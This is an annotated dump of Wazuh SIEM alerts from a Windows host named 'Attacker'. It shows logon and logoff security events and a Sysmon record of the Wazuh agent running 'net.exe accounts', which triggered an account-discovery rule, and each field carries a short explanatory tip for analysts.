data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:17.3513964Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43764 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 5404 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 2
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: No
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x25F285D
Linked Logon ID: 0x25F1ED7
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x624
Process Name: C:\Windows\System32\svchost.exe
Network Information:
Workstation Name: ATTACKER
Source Network Address: 127.0.0.1
Source Port: 0
Detailed Authentication Information:
Logon Process: User32
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x25f285d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: User32 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.workstationName: ATTACKER No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x624 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipAddress: 127.0.0.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipPort: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x25f1ed7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533928.484358 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4634 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12545 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:17.3563661Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43766 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10720 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was logged off.
Subject:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x25F285D
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x25f285d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533928.486825 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4634 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12545 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:17.3658372Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43767 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 13300 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was logged off.
Subject:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x25F1ED7
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x25f1ed7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533928.489292 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:20.5246392Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43772 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 5404 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533928.496628 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:24.4863616Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43774 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 5404 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533929.503964 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:36:57.1322035Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 212225 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-17 16:36:57.031
ProcessGuid: {94294ddc-2e29-6801-dd07-000000000e00}
ProcessId: 14844
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:36:57.031 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-2e29-6801-dd07-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14844 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533929.509200 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4616 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12288 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
